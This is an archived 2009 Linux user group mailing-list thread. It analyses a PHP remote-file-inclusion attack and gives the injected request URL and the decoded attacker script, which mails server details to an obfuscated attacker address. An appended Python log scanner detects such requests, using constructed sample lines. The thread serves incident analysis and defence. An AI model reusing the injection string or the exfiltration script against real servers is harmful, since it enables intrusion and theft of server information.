[NTLUG:Discuss] http://sito.blackdrag0n.net/Cartoon/idnew.txt?

m m llliiilll at hotmail.com
Mon May 11 13:06:06 CDT 2009


 

All,
 
Finally figured it out. This is a hacker trying to steal information about your server IP, web server user... and email it to fr33sh3ll at gmail.com

What is serious about this? It can range from nothing to destroying your server, depending on your web user. In other words, if you run PHP as an Apache module, this bad guy can put in executable code that does anything the web user can do.

For those who want to know a few details, here is the decrypted code:

 

$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ=="); 
($safe_mode)?($safez="ON"):($safez="OFF_HEHE"); 
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; 
$name = php_uname(); 
 
$ip = getenv("REMOTE_ADDR"); 
$ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); 
$subj = $_SERVER['HTTP_HOST']; 
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; 
$from ="From: ".$writ."___=".$safez."<TOOL@".$_SERVER['HTTP_HOST'].""; 
 
mail( $creator, $subj, $msg, $from);
 
Note:
base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==") = fr33sh3ll at gmail.com

> From: llliiilll at hotmail.com
> To: discuss at ntlug.org
> Date: Mon, 11 May 2009 14:48:05 +0000
> Subject: [NTLUG:Discuss] http://sito.blackdrag0n.net/Cartoon/idnew.txt?
> 
> 
> Anyone have an idea about this hack?
> 
> 
> 
> ?_SERVER[DOCUMENT_ROOT]=http://sito.blackdrag0n.net/Cartoon/idnew.txt?
> 
> 
> 
> I have googled it. Not much information about it. It seems to be a new hack.
> 
> 
> 
> What happened is that it made my company's web sites go down. I have not figured out how/why it makes the web site go down, but here is a little detail:
> 
> 
> 
> One of the applications causes the problem. This application allows users to create accounts and upload image/movie files.
> 
> When movie files are uploaded, it automatically converts them to FLV format and deletes the original movie files. After we disabled this application, the problem was solved. This is not necessarily the cause of the problem. I just mention it.
> 
> 
> 
> Any comments are welcome.
> 
> 
> 
> Thanks. 
> 
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
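
An added example, not part of the original post or of the decoded script: a Python access-log triage that flags requests shaped like the quoted `?_SERVER[DOCUMENT_ROOT]=http://...` one, where a query parameter names a PHP superglobal or carries a remote URL. The log lines, addresses and hostnames are constructed, and the function names (`classify`, `scan`) are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote

# PHP superglobal names that a request may try to overwrite via the query string.
SUPERGLOBALS = {"_SERVER", "_GET", "_POST", "_COOKIE", "_FILES", "_ENV",
                "_REQUEST", "_SESSION", "GLOBALS"}
REMOTE_VALUE = re.compile(r"^\s*(https?|ftp)://", re.IGNORECASE)
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request line in a combined-format log

def classify(target):
    """Return (reason, name, value) for each suspicious query parameter in a request target."""
    findings = []
    query = target.partition("?")[2]
    for name, value in parse_qsl(query, keep_blank_values=True):
        name, value = unquote(name), unquote(value)  # second pass catches double encoding
        base = name.split("[", 1)[0].strip()
        overwrite = base in SUPERGLOBALS
        remote = bool(REMOTE_VALUE.match(value))
        if overwrite and remote:
            findings.append(("superglobal-rfi", name, value))
        elif overwrite:
            findings.append(("superglobal-overwrite", name, value))
        elif remote:  # can be a legitimate redirect parameter: review, do not auto-block
            findings.append(("remote-url-param", name, value))
    return findings

def scan(lines):
    """Return (line_number, client, findings) for every log line with suspicious parameters."""
    results = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        findings = classify(m.group(1)) if m else []
        if findings:
            results.append((n, line.split()[0], findings))
    return results

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/May/2009:09:40:01 -0500] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://attacker.example/idnew.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [11/May/2009:09:40:02 -0500] "GET /index.php?%5FSERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fattacker.example%2Fidnew.txt%3F HTTP/1.1" 200 512',
    '198.51.100.4 - - [11/May/2009:09:41:10 -0500] "GET /gallery.php?id=42&sort=date HTTP/1.1" 200 2048',
    '198.51.100.9 - - [11/May/2009:09:42:30 -0500] "GET /out.php?next=https://partner.example/ HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for line_no, client, findings in scan(SAMPLE_LOG):
        print(line_no, client, findings)
```
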
